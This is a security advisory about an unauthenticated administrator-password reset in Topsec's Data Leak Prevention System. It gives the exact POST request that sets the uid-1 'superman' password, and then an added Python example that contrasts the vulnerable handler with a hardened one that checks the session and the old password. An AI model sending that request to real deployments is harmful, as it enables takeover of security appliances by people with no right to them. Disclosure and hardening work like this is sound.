Posted 2020-09-13, updated 2021-03-03. Category: WEB Security

天融信 (Topsec) Data Leak Prevention System: unauthorized modification of the administrator password

No login privileges are required. The password-change function does not verify the original password, and the /?module=auth_user&action=mod_edit_pwd interface can be reached without authorization, so the password of any user can be changed directly. Note: the default superman account has uid 1.

    POST /?module=auth_user&action=mod_edit_pwd
    Cookie: username=superman; uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1

Author: ol4three
Source: http://www.ol4three.com/2020/09/13/WEB/Exploit/%E5%A4%A9%E8%9E%8D%E4%BF%A1%E6%95%B0%E6%8D%AE%E9%98%B2%E6%B3%84%E6%BC%8F%E7%B3%BB%E7%BB%9F%E8%B6%8A%E6%9D%83%E4%BF%AE%E6%94%B9%E7%AE%A1%E7%90%86%E5%91%98%E5%AF%86%E7%A0%81/
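The advisory names two separate defects: the endpoint accepts requests without an authenticated session, and it never asks for the current password. The following is an added example, not code from the original post or from the vendor's product, that models a password-change handler with exactly those two weaknesses next to a hardened version of the same handler. The user table, the server-side session store, the `login`, `vulnerable_mod_edit_pwd` and `hardened_mod_edit_pwd` functions and the fixed salt are all assumptions constructed for this illustration.

```python
"""
Added example (not the vendor's code): a toy password-change endpoint with the
two defects the advisory describes, beside a hardened handler. All names and
data here are constructed for illustration.
"""
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Fixed salt so the example is reproducible; production code uses a random
# per-user salt stored next to the hash.
_SALT = b"constructed-fixed-salt"


def _hash_pw(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), _SALT, 50_000)


# Constructed sample data: uid -> account record. uid 1 mirrors the advisory's
# note that the default administrator account has uid 1.
USERS: Dict[int, dict] = {
    1: {"username": "superman", "pw_hash": _hash_pw("OldPass!")},
    2: {"username": "auditor", "pw_hash": _hash_pw("Audit#1")},
}

# Server-side session store: token -> uid. Only login() writes to it, so a uid
# found here is one the server established, not one the client claimed.
SESSIONS: Dict[str, int] = {}


def check_password(uid: int, password: str) -> bool:
    """Constant-time comparison of a candidate password against the stored hash."""
    return hmac.compare_digest(USERS[uid]["pw_hash"], _hash_pw(password))


def login(username: str, password: str) -> Optional[str]:
    """Issue a session token only after the credentials verify."""
    for uid, rec in USERS.items():
        if rec["username"] == username and check_password(uid, password):
            token = secrets.token_hex(16)
            SESSIONS[token] = uid
            return token
    return None


def vulnerable_mod_edit_pwd(cookies: dict, form: dict) -> bool:
    """Models the defective handler: the identity is whatever uid the client
    sends, no session is required, and the current password is never checked."""
    uid = int(form.get("uid", cookies.get("uid", 0)))
    if uid not in USERS:
        return False
    USERS[uid]["pw_hash"] = _hash_pw(form["pd"])
    return True


def hardened_mod_edit_pwd(cookies: dict, form: dict) -> bool:
    """Hardened handler: identity comes from a server-side session, any uid in
    the request is ignored, and the current password must verify first."""
    uid = SESSIONS.get(cookies.get("session", ""))
    if uid is None:
        return False  # no authenticated session: reject before touching state
    if not check_password(uid, form.get("old_pd", "")):
        return False  # current password did not verify
    USERS[uid]["pw_hash"] = _hash_pw(form["pd"])
    return True


if __name__ == "__main__":
    # Unauthenticated request with a client-chosen uid: accepted by the weak
    # handler, rejected by the hardened one.
    req_cookies = {"username": "superman", "uid": "1"}
    req_form = {"uid": "1", "pd": "Newpasswd"}
    print("vulnerable:", vulnerable_mod_edit_pwd(req_cookies, req_form))
    print("hardened (no session):", hardened_mod_edit_pwd(req_cookies, req_form))
```

The hardened variant fixes both issues independently: even if the session check were bypassed, the old-password check still blocks a blind reset, and even if the old password were known, the session binding stops one user from changing another user's password by supplying a different uid.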